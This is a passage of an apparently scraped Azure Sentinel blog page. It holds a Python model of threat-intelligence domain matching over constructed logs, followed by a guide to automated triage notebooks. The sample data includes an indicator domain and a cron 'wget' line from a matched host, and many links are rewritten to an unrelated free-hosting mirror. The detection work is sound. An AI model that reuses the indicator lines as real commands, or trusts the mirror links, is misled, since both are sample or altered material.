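     "RequestURL": "https://good.example/"},       # not an indicator
]
DNS_EVENTS = [
    {"TimeGenerated": "2021-07-28T04:00:00Z", "SubType": "LookupQuery", "QueryType": "A",
     "Name": "evil.example"},
    {"TimeGenerated": "2021-07-28T05:00:00Z", "SubType": "LookupQuery", "QueryType": "MX",
     "Name": "abc.com"},                           # only A and AAAA are processed
    {"TimeGenerated": "2021-07-29T06:00:00Z", "SubType": "LookupQuery", "QueryType": "AAAA",
     "Name": "abc.com"},                           # 29 h after the first abc.com hit
]
SYSLOG = [
    {"TimeGenerated": "2021-07-28T06:30:00Z", "Facility": "cron",
     "SyslogMessage": "(root) CMD (/usr/bin/wget -q http://abc.com/health)"},
    {"TimeGenerated": "2021-07-28T07:00:00Z", "Facility": "auth",
     "SyslogMessage": "Accepted publickey for svc from abc.com"},  # facility is not "cron"
]

SOURCE_STAMP = "Microsoft Threat Intelligence Analytics"
DOMAIN_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def _alert(domain: str, row: dict, table: str) -> dict:
    return {"observable": domain, "time": _ts(row["TimeGenerated"]), "source_table": table}


def match_domains(cef, dns, syslog, indicators):
    """Apply the documented per-table scoping rules and return one alert per hit."""
    alerts = []
    for row in cef:                                       # CEF: host of RequestURL, non-Cisco only
        if row.get("DeviceVendor") == "Cisco":
            continue
        host = urlsplit(row.get("RequestURL", "")).hostname
        if host and host.lower() in indicators:
            alerts.append(_alert(host.lower(), row, "CommonSecurityLog"))
    for row in dns:                                       # DNS: client lookups, A/AAAA only
        if row.get("SubType") != "LookupQuery" or row.get("QueryType") not in ("A", "AAAA"):
            continue
        name = row.get("Name", "").lower().rstrip(".")
        if name in indicators:
            alerts.append(_alert(name, row, "DnsEvents"))
    for row in syslog:                                    # Syslog: cron facility, domain parsed from message
        if row.get("Facility") != "cron":
            continue
        found = {m.lower() for m in DOMAIN_RE.findall(row.get("SyslogMessage", ""))}
        for domain in found & indicators:
            alerts.append(_alert(domain, row, "Syslog"))
    return alerts


def group_into_incidents(alerts, window=timedelta(hours=24)):
    """Group alerts per observable; a new incident opens once the 24-hour window is exceeded."""
    incidents, open_incident = [], {}
    for alert in sorted(alerts, key=lambda a: a["time"]):
        current = open_incident.get(alert["observable"])
        if current is None or alert["time"] - current["window_start"] >= window:
            current = {"observable": alert["observable"], "window_start": alert["time"], "alerts": []}
            incidents.append(current)
            open_incident[alert["observable"]] = current
        current["alerts"].append(alert)
    return incidents


def publish_indicators(alerts):
    """One indicator row per matched observable, stamped with the documented Source value."""
    rows = {}
    for alert in sorted(alerts, key=lambda a: a["time"]):
        rows.setdefault(alert["observable"], {"DomainName": alert["observable"],
                                              "Source": SOURCE_STAMP, "FirstSeen": alert["time"]})
    return list(rows.values())


def run_rule():
    """Run matching, grouping and publishing over the constructed sample data."""
    alerts = match_domains(COMMON_SECURITY_LOG, DNS_EVENTS, SYSLOG, TI_DOMAINS)
    return alerts, group_into_incidents(alerts), publish_indicators(alerts)


if __name__ == "__main__":
    sample_alerts, sample_incidents, published = run_rule()
    for inc in sample_incidents:
        print(inc["observable"], len(inc["alerts"]), "alert(s), window from", inc["window_start"])
    print(len(published), "indicator(s) published with Source =", SOURCE_STAMP)
```

With the constructed data the model produces four alerts (three for abc.com, one for evil.example) and three incidents: the two abc.com hits on 28 July share one incident, while the AAAA lookup 29 hours later opens a second one, which is the per-observable 24-hour grouping the section describes. Only two indicator rows are published, one per distinct matched domain.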
The indicators are stamped with the Source as “Microsoft Threat Intelligence Analytics”.</FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 3.png" style="width: 527px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294166i3FA04D6E11FBE345/image-size/large?v=v2&amp;px=999" role="button" title="Image 3.png" alt="Image 3.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="4"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Image 4.png" style="width: 528px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/294167i29B10D79F80AFD2C/image-size/large?v=v2&amp;px=999" role="button" title="Image 4.png" alt="Image 4.png" /></span></FONT></P> <P>&nbsp;</P> <P><FONT size="5"><STRONG>Conclusion</STRONG></FONT></P> <P><FONT size="4">Hopefully, this article has helped you understand how to leverage Microsoft generated threat intelligence matching analytics for generating high fidelity alerts and incidents and triage through them using the information provided with the indicator of compromise (IOC) published to the workspace.</FONT></P> Wed, 28 Jul 2021 17:01:40 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-threat-intelligence-matching-analytics/ba-p/2525605 RijutaKapoor 2021-07-28T17:01:40Z Software Defined Monitoring - Using Automated Notebooks and Azure Sentinel to Improve Sec Ops https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775 <P>Incident triage is a core component of security monitoring operations and ensuring triage processes are efficient and effective is key to detecting security threats. Recent high profile security incidents have shown that detecting threats is insufficient unless effective triage and investigation of them is conducted. 
In this blog we detail how to deploy and use a solution that allows for the automatic execution of Jupyter Notebooks to provide enrichment to incidents within Azure Sentinel. &nbsp;This process allows security analysts to triage incidents more quickly and effectively, as well as ensuring a consistent, quality approach is taken.</P> <P>&nbsp;</P> <H2>Background</H2> <P>The objective of this solution is to reduce the time and effort required for a Security Operations Center (SOC) analyst to triage an incident within Azure Sentinel and help ensure a consistent approach is taken to each incident. This is done by automatically executing Jupyter notebooks that perform a set of pre-defined actions on the incident like those conducted by an analyst when triaging an incident. It provides three main benefits:</P> <UL> <LI>It makes the triaging of incidents more efficient by running some logic against the incidents and adjusting incident severity based on the output of the enrichment run in the notebook.</LI> <LI>It makes the results of the enrichment easily viewable by the SOC analyst by adding a link to the executed notebook to the incident log. This saves the analysts valuable time when triaging the incident.</LI> <LI>By executing these steps from a template pattern, it provides a consistent triage approach for all incidents, helping to ensure quality and reduce the chance of a security incident being missed.</LI> </UL> <P>We refer to this approach of using notebook patterns to define and execute these processes as Software Defined Monitoring. 
To learn more about this approach, please watch this recent webinar we presented on the subject.</P> <P>&nbsp;</P> <P><LI-VIDEO vid="https://www.youtube.com/watch?v=pezPO5S_aaQ" align="center" size="medium" width="400" height="225" uploading="false" thumbnail="https://i.ytimg.com/vi/pezPO5S_aaQ/hqdefault.jpg" external="url"></LI-VIDEO></P> <P>&nbsp;</P> <H2>Contents</H2> <OL> <LI>Summary of the solution.</LI> <LI>Architecture overview.</LI> <LI>Deploying the solution. <OL> <LI>Collect required variables.</LI> <LI>Add variables to the notebook.</LI> <LI>Deploying Papermill infrastructure. <OL> <LI>Deploying with ARM.</LI> <LI>Manual deployment.</LI> </OL> </LI> <LI>Deploying KeyVault Access.</LI> <LI>Installing required packages.</LI> <LI>MSTICPy Config</LI> <LI>Optional - Using Azure Storage Queues to manage which incidents are triaged.</LI> </OL> </LI> <LI>Using the notebooks during incident triage.</LI> <LI>Troubleshooting.</LI> </OL> <P>&nbsp;</P> <H2>Summary of the solution</H2> <P>This document covers the end-to-end process for deploying this solution within an Azure subscription, including all the requisite components for the automated notebook elements. Along with this document are two separate Jupyter Notebooks and an ARM template for deploying the required VM. The first notebook is ‘AutomatedNotebooks-Manager.ipynb’ and the other is ‘AutomatedNotebooks-IncidentTriage.ipynb’. 
These notebooks, along with the ARM template and a Python requirements file, can be downloaded from GitHub:</P> <UL> <LI><A href="#" target="_blank" rel="noopener">ARM Template</A></LI> <LI><A href="#" target="_blank" rel="noopener">Requirements file</A></LI> <LI><A href="#" target="_blank" rel="noopener">AutomatedNotebooks-Manager.ipynb</A></LI> <LI><A href="#" target="_blank" rel="noopener">AutomatedNotebooks-IncidentTriage.ipynb</A></LI> </UL> <P>&nbsp;</P> <P>In addition to these resources, the following are prerequisites:</P> <UL> <LI>An Azure subscription, with permissions to deploy resources within it.</LI> <LI>An Azure Virtual Machine (VM) to run the automated notebooks.</LI> <LI>An Azure Sentinel workspace.</LI> <LI>An Azure Key Vault, with the ability to read and write secrets to it.</LI> <LI>An Azure Machine Learning (ML) workspace.</LI> </UL> <H2>Architecture overview</H2> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Architecture.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298431i12B3E496D5323334/image-size/large?v=v2&amp;px=999" role="button" title="Architecture.png" alt="Architecture.png" /></span></P> <P>&nbsp;</P> <P>The core of the solution is an Azure VM that runs several Jupyter notebooks. The Manager notebook programmatically gets details of incidents from Azure Sentinel; if these match a set of criteria, it then runs another notebook that performs triage and enrichment based on the entities attached to that incident. That completed triage notebook is then written to an Azure ML workspace, with a link to the notebook added as a comment to the incident in Azure Sentinel. From there the SOC analyst can follow the link to view and interact with the completed triage notebook. 
In addition, depending on the findings in the notebook the severity of the Incident is updated in Azure Sentinel.</P> <P>&nbsp;</P> <H2>Deploying the solution</H2> <H3>Collect required variables.</H3> <P>To deploy the solution, some configurable variables are first required:</P> <P>&nbsp; 1. The Azure <EM>Tenant ID</EM> where the resources being used are. <A href="#" target="_blank" rel="noopener">More details</A>.</P> <P>&nbsp; 2. The <EM>Subscription ID</EM> where your Azure Sentinel Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="1.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298432i52342280289C4A43/image-size/large?v=v2&amp;px=999" role="button" title="1.png" alt="1.png" /></span>&nbsp; 3. The <EM>Resource Group</EM> name where your Azure Sentinel Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298433i78E01B3DEC223398/image-size/large?v=v2&amp;px=999" role="button" title="2.png" alt="2.png" /></span></P> <P>&nbsp; 4. 
The <EM>Workspace Name</EM> of your Azure Sentinel Workspace.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="3.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298434i56FA5F9D709F2698/image-size/large?v=v2&amp;px=999" role="button" title="3.png" alt="3.png" /></span></P> <P>&nbsp; 5. The <EM>Workspace ID</EM> of your Azure Sentinel Workspace.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Azure Sentinel &gt; Settings &gt; Workspace settings &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="4.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298435i5DDD942B9A30E1C1/image-size/large?v=v2&amp;px=999" role="button" title="4.png" alt="4.png" /></span></P> <P>&nbsp; 6. The <EM>Subscription ID</EM> where your Azure ML Workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="5.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298437i47BE3D6FC97F69F4/image-size/large?v=v2&amp;px=999" role="button" title="5.png" alt="5.png" /></span></P> <P>&nbsp; 7. 
The <EM>Resource Group</EM> name where your Azure ML workspace is deployed.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="6.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298439iB9E5F29DA3B2E3F1/image-size/large?v=v2&amp;px=999" role="button" title="6.png" alt="6.png" /></span></P> <P>&nbsp; 8. The <EM>Azure ML Workspace</EM> name.</P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure portal &gt; under the Azure ML resource &gt; Overview</LI> </OL> <P>Note: in this example the workspace name is “AzureMLWorkspace”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="7.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298440i0080E69B20AEF171/image-size/large?v=v2&amp;px=999" role="button" title="7.png" alt="7.png" /></span>&nbsp; 9.&nbsp;<SPAN style="font-family: inherit;">The name of the </SPAN><EM style="font-family: inherit;">Key Vault</EM><SPAN style="font-family: inherit;"> being used (see pre-requisites).</SPAN></P> <OL class="lia-list-style-type-lower-alpha"> <LI>This can be found in the Azure Portal &gt; Key Vault &gt; Overview</LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="8.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298441i86E6FD5CAEC4098F/image-size/large?v=v2&amp;px=999" role="button" title="8.png" alt="8.png" /></span></P> <P>&nbsp; 10. Another variable required is an <EM>Access Key</EM> for the Storage Account used by your Azure ML Workspace. Due to the sensitivity of this key we will store it in KeyVault in order to keep it secure. 
To find the storage account associated with your Azure ML workspace, find the Azure ML resource in the Azure Portal and browse to the Overview tab. Listed here will be a storage resource:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="storage.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298442i2FD7D1D7ACFFA373/image-size/large?v=v2&amp;px=999" role="button" title="storage.png" alt="storage.png" /></span></P> <P>Clicking on that resource will open it in the Azure Portal. From there select the Access Keys and you will be presented with two access keys. Select the Key value from one of these (it doesn’t matter which one you use), and then <A href="#" target="_blank" rel="noopener">add that as a Secret in your KeyVault</A>. When adding the Access Key, make a note of the name you give the secret as it will be needed later in the set up. (Do not paste the storage key into the notebook.)</P> <P>&nbsp;</P> <H3>Adding variables to the notebook</H3> <P>Once the above elements have been collected, the “AutomatedNotebooks-Manager.ipynb” notebook needs to be updated to include these values. They are all set in a single cell near the top of the notebook; simply open the notebook<A href="https://gorovian.000webhostapp.com/?exam=#_edn1" target="_blank" rel="noopener" name="_ednref1"><SPAN>[i]</SPAN></A> and replace the placeholder values with those collected above. 
The cell includes comments that detail where each value should go.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="10.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298443iEE540FE606B738A9/image-size/large?v=v2&amp;px=999" role="button" title="10.png" alt="10.png" /></span></P> <P>You will see sections in this cell for details of an Azure Storage Queue; these are optional settings, covered later in this document (see the <A href="https://gorovian.000webhostapp.com/?exam=#_Queue_Management" target="_blank" rel="noopener">Queue Management</A> section).</P> <P>&nbsp;</P> <H3>Deploying Papermill infrastructure</H3> <P>The technology used to run the automated notebooks is <A href="#" target="_blank" rel="noopener">Papermill</A>. A dedicated Azure IaaS VM will be deployed to run the Papermill tasks. In this documentation we describe how to deploy an Ubuntu Linux host; however, the solution could also be deployed on a Windows host.</P> <P>&nbsp;</P> <H4>Deploying via ARM</H4> <P>To make deployment easier we have created an ARM template that deploys the VM and configures some of the required identity elements. 
If you want to deploy using this method, the ARM template can be downloaded from <A href="#" target="_blank" rel="noopener">GitHub</A>, and you can find instructions on how to deploy it <A href="#" target="_blank" rel="noopener">here</A>.</P> <P>During deployment you will be asked to provide a number of parameters; these include:</P> <UL> <LI>The Resource Group you want to deploy the resources in.</LI> <LI>An SSH key to use to access the VM.</LI> <LI>The Subscription ID and Resource Group name where your Azure Sentinel workspace is (if different from the Resource Group that the VM is being deployed in).</LI> <LI>The Subscription ID and Resource Group name where your AzureML workspace is (if different from the Resource Group that the VM is being deployed in).</LI> </UL> <P>When deploying the ARM template you will be asked to provide these variables on the following page:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="11.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298445i59DB48B9BF294B25/image-size/large?v=v2&amp;px=999" role="button" title="11.png" alt="11.png" /></span></P> <P>If you deploy the VM via ARM you can skip ahead to the ‘Deploying KeyVault Access’ section.</P> <P>&nbsp;</P> <H4>Deploying Manually</H4> <P>When deploying Azure VMs we recommend that you <A href="#" target="_blank" rel="noopener">follow best practice</A> and secure access to the VM using Just In Time Access and Azure Defender.</P> <P>Detailed instructions on deploying a Linux VM in Azure can be found <A href="#" target="_blank" rel="noopener">here</A>. We recommend that a SKU with at least 2 vCPUs and 4 GiB memory is used.</P> <P>Once the VM is deployed it needs to be assigned a <EM>Managed Identity</EM>. This identity will be used by the Papermill process to access Azure Sentinel, as well as secrets stored in Azure Key Vault. 
This can be configured by browsing to the Azure VM created previously in the Azure Portal and selecting the <STRONG>Identity </STRONG>tab. From here select <STRONG>System Assigned</STRONG> and set the <STRONG>Status</STRONG> to <STRONG>On</STRONG>. Once enabled, you need to grant some required permissions to the VM managed identity. To do this, select <STRONG>Azure role assignments</STRONG>.</P> <P><STRONG><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="12.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298446iC9BCFB349D46AB73/image-size/large?v=v2&amp;px=999" role="button" title="12.png" alt="12.png" /></span></STRONG></P> <P>The first permission is to access Azure Sentinel. The automated notebooks need to access incident details, query logs to gather context, and update incidents based on the output of their analysis. As such, <EM>Azure Sentinel Responder</EM> role permissions are required. More details about this role can be <A href="#" target="_blank" rel="noopener">found here</A>. Currently, this role cannot be set directly on the Azure Sentinel workspace, so the role must be scoped at the Subscription or Resource Group level. We recommend that the Resource Group is used as it’s the lowest level of access available. Ensure that you select the Resource Group that contains the Azure Sentinel workspace you want to use.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="13.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298447i994984A696BD74D0/image-size/large?v=v2&amp;px=999" role="button" title="13.png" alt="13.png" /></span></P> <P>Finally, the papermill process needs to be able to enumerate resources associated with the Azure ML Workspace being used. This is needed to locate the file store used by the Azure ML workspace so that executed notebooks can be written there. 
Therefore, the VM Managed Identity needs the Reader role assigned for the Resource Group that contains your Azure ML workspace.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="14.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298448iE78D4212578C36C2/image-size/large?v=v2&amp;px=999" role="button" title="14.png" alt="14.png" /></span></P> <H4>Deploying KeyVault Access</H4> <P>Regardless of how you deployed the VM, you will need to manually add a further role assignment to the VM's managed identity so that it can access the Key Vault we are using and retrieve the secrets stored there. To do this open the VM you deployed in the Azure Portal and select the `Identity` section. From there select `Azure Role Assignments` and `Add Role Assignment`. As Key Vault is a specific resource available for Managed Identity role provision, you can select the specific Key Vault you are using for this solution<A href="https://gorovian.000webhostapp.com/?exam=#_edn1" target="_blank" rel="noopener" name="_ednref1"><SPAN>[i]</SPAN></A> once you have selected `Key Vault` as the scope. 
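</P> <P>As an added example (not code from the Azure-Sentinel-Notebooks project), the pattern below shows how the variables cell of the Manager notebook can keep the Azure ML storage account key out of the notebook file entirely: the non-secret values collected earlier stay in the cell, while the key is read from Key Vault at run time through the VM's managed identity, which holds the Key Vault Secrets User role on that vault. It also refuses to run if something shaped like a storage key has been pasted into the cell. All names, IDs and the secret name are constructed placeholders; the azure-identity and azure-keyvault-secrets packages are assumed to be installed on the VM.</P>

```python
"""Configuration pattern for the Manager notebook's variables cell (added example,
not the project's own cell). Non-secret settings live here; the storage account
key is fetched from Key Vault via managed identity and never stored in the notebook.
All values below are constructed placeholders.
"""
import re
from dataclasses import dataclass, fields
from typing import Optional

# Key Vault names: 3-24 chars, letters/digits/hyphens, start with a letter, end alphanumeric.
_VAULT_NAME = re.compile(r"^[A-Za-z][A-Za-z0-9-]{1,22}[A-Za-z0-9]$")
# Storage account keys are 88-character base64 strings; used only to refuse pasted keys.
_LOOKS_LIKE_STORAGE_KEY = re.compile(r"^[A-Za-z0-9+/]{86}==$")


@dataclass(frozen=True)
class ManagerConfig:
    tenant_id: str
    sentinel_subscription_id: str
    sentinel_resource_group: str
    workspace_name: str
    workspace_id: str
    ml_subscription_id: str
    ml_resource_group: str
    ml_workspace_name: str
    key_vault_name: str
    storage_key_secret_name: str                 # name given to the secret when it was added
    queue_storage_account: Optional[str] = None  # optional queue settings (see later section)
    queue_name: Optional[str] = None


def vault_url(key_vault_name: str) -> str:
    """Build the public-cloud vault URL after validating the vault name."""
    if not _VAULT_NAME.match(key_vault_name):
        raise ValueError(f"invalid Key Vault name: {key_vault_name!r}")
    return f"https://{key_vault_name}.vault.azure.net"


def reject_inline_secrets(cfg: ManagerConfig) -> None:
    """Fail fast if a storage key was pasted into the config cell instead of Key Vault."""
    for f in fields(cfg):
        value = getattr(cfg, f.name)
        if isinstance(value, str) and _LOOKS_LIKE_STORAGE_KEY.match(value):
            raise ValueError(f"{f.name} looks like a storage account key; store it in Key Vault")


def make_secret_client(cfg: ManagerConfig):
    """Real client: the VM's managed identity plus Key Vault Secrets User on the vault."""
    from azure.identity import ManagedIdentityCredential      # assumed installed on the VM
    from azure.keyvault.secrets import SecretClient
    return SecretClient(vault_url=vault_url(cfg.key_vault_name),
                        credential=ManagedIdentityCredential())


def load_storage_key(cfg: ManagerConfig, client) -> str:
    """Fetch the storage key; `client` only needs get_secret(name) returning an object with .value."""
    reject_inline_secrets(cfg)
    value = client.get_secret(cfg.storage_key_secret_name).value
    if not value:
        raise RuntimeError(f"secret {cfg.storage_key_secret_name!r} is empty")
    return value


def redact(value: str, keep: int = 4) -> str:
    """Log-safe rendering of a secret: only the last `keep` characters survive."""
    return "*" * (len(value) - keep) + value[-keep:] if len(value) > keep else "*" * len(value)


# Constructed sample configuration for this example (not real resources).
SAMPLE_CONFIG = ManagerConfig(
    tenant_id="00000000-0000-0000-0000-00000000000a",
    sentinel_subscription_id="00000000-0000-0000-0000-00000000000b",
    sentinel_resource_group="Sentinel",
    workspace_name="sentinelworkspace",
    workspace_id="00000000-0000-0000-0000-00000000000c",
    ml_subscription_id="00000000-0000-0000-0000-00000000000b",
    ml_resource_group="AzureML",
    ml_workspace_name="AzureMLWorkspace",
    key_vault_name="example-kv-01",
    storage_key_secret_name="azureml-storage-key",
)

if __name__ == "__main__":
    key = load_storage_key(SAMPLE_CONFIG, make_secret_client(SAMPLE_CONFIG))
    print("storage key loaded:", redact(key))
```

<P>In the notebook, the cell would call load_storage_key once and keep the value in a local variable only; anything written to the execution log should go through redact.</P> <P>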
The `Key Vault Secrets User` role is required; more details on this role can be <A href="#" target="_blank" rel="noopener">found here</A>.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="15.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298449i09A932979C95B7CF/image-size/large?v=v2&amp;px=999" role="button" title="15.png" alt="15.png" /></span></P> <P>More details about Managed Identities can be <A href="#" target="_blank" rel="noopener">found here</A>.</P> <P>Note: your KeyVault needs to be configured for Role Based Access Control – more details can be found here: <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/key-vault/general/rbac-guide?tabs=azure-cli</A></P> <H3>&nbsp;</H3> <H3>Installing required packages</H3> <P>With the VM deployed and the correct permissions assigned via a Managed Identity, the next step is to install Papermill and the other required packages on our VM host. These require Python 3 to be installed first; if you deployed an Ubuntu Linux VM this will be installed by default and packages can be installed immediately. If another OS was deployed, you may need to first install Python 3.</P> <P>&nbsp;</P> <P style="border: solid 1px; padding: 10px; background-color: #fafaff;"><STRONG>Optional Step: </STRONG> To manage package installs you can choose to use a solution like Conda or Python virtualenv to create a dedicated Python environment for papermill to operate in. If you don’t plan on running anything except automated notebooks on a host this isn’t essential but might make future management easier. If you choose to do this, follow the steps below within your virtual environment, and when scheduling the regular task ensure you first activate your chosen virtual environment.</P> <P>&nbsp;</P> <P>The installation of packages will be done using <STRONG>pip;</STRONG> this first needs to be installed if not present. 
On an Ubuntu VM this can be done by running the command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">sudo apt install python3-pip</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Note: you may need to first run `sudo apt update`</P> <P>To install the required packages download the autonb-requirements.txt file from <A href="#" target="_blank" rel="noopener">GitHub</A> and install the packages detailed in that file using <A href="#" target="_blank" rel="noopener">Pip</A> with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">python3 -m pip install -r autonb-requirements.txt</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once installed, ensure the papermill executable is on your $PATH and restart the terminal so that it is available via the CLI.</P> <P>Once the packages are installed you will also need to configure a kernel to execute the notebooks with. This is done with ipykernel, which you should have just installed with the above commands. You can create a new kernel called ‘papermill’ (this is the default kernel used by the notebooks) with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">python3 -m ipykernel install --user --name papermill</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once papermill and the required packages are installed and the kernel created, copy the two notebooks (‘AutomatedNotebooks-Manager.ipynb’ and ‘AutomatedNotebooks-IncidentTriage.ipynb’) to the host. These should be stored in the same folder.</P> <P>&nbsp;</P> <H3>MSTICPy Config</H3> <P>In order to use threat intelligence providers as part of the incident triage notebook, a msticpyconfig.yaml file containing details of those threat intelligence providers is required on the deployed VM. This should be placed in the same folder as the ‘AutomatedNotebooks-Manager.ipynb’ notebook and only needs to contain keys for TI providers; the incident triage notebook will use all primary providers configured. 
If you are using KeyVault to store these secrets you will also need to ensure that you assign the VM `Key Vault Secrets User` access to the KeyVault these are stored in as well.</P> <P>More details on the msticpyconfig.yaml file and how to set it up can be found in the <A href="#" target="_blank" rel="noopener">MSTICPy documentation.</A></P> <P style="border: solid 1px; padding: 10px; background-color: #fafaff;"><STRONG>Optional Step: </STRONG>At this point we can test the configuration by manually triggering the notebooks. To do this ensure you have some incidents present in your Azure Sentinel workspace and then tell Papermill to manually trigger the scheduling notebook. To do this browse to the folder containing your notebooks and run the following command: papermill ‘AutomatedNotebooks-Manager.ipynb’ - This command will run the scheduling notebook and subsequently the incident triage notebooks. You will see the output of the notebook and execution in stdout and can triage this to ensure you don’t have any errors.</P> <P>&nbsp;</P> <P>Once the papermill configuration is complete and the notebooks set up, you can schedule the ‘AutomatedNotebooks-Manager.ipynb’ to be run on a regular basis. This notebook will check for new incidents and run the triage notebook against them. Scheduling is done by simply using the OS’s built-in scheduling service, in this case <EM>cron</EM>. The precise schedule to run this notebook can be tuned depending on your requirements; however, for the most immediate response to new incidents being created we suggest that this be set to run every 10 minutes.</P> <P>&nbsp;</P> <P>The scheduled command needs to a) navigate to the folder containing the notebooks and b) execute the ‘AutomatedNotebooks-Manager.ipynb’ notebook. 
An example cron entry to run the notebook every 10 minutes would be:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">*/10 * * * * cd &lt;path to notebooks folder&gt; &amp;&amp; papermill "AutomatedNotebooks-Manager.ipynb" SchedulerOut$ </LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>Once the schedule is set up, you will start to see incidents with comments that provide a link to a notebook in Azure ML. Only notebooks that include a significant finding are attached to incidents; otherwise the notebook is simply discarded.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="16.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298451i7C761521C175F92C/image-size/large?v=v2&amp;px=999" role="button" title="16.png" alt="16.png" /></span></P> <H3>&nbsp;</H3> <H2>Optional – Using Azure Storage Queues to manage which incidents are triaged</H2> <P>By default, the automated notebook process will run against all incidents raised in your Azure Sentinel Workspace. However, if you wish to only run the process against a subset of incidents, you can use a method that leverages <STRONG>Azure Storage Queues</STRONG>. Rather than pull all incidents from Azure Sentinel, the “AutomatedNotebooks-Manager.ipynb” notebook can be configured to pull selected incident IDs from the queue and run the automated notebooks against only those incidents. The following are entirely optional steps, needed only if you want to use the queue method.</P> <H4>&nbsp;</H4> <H4>Create Storage Queue</H4> <P>For ease of management, we suggest that you create a Storage Queue in the Storage Account used by your Azure ML Workspace (see details earlier in the document to find this). If you choose to use another storage account, ensure that the VM’s Managed Identity is granted access to the Storage Account.</P> <P>To create a queue, navigate to the Storage Account in the Azure Portal and select Queues. 
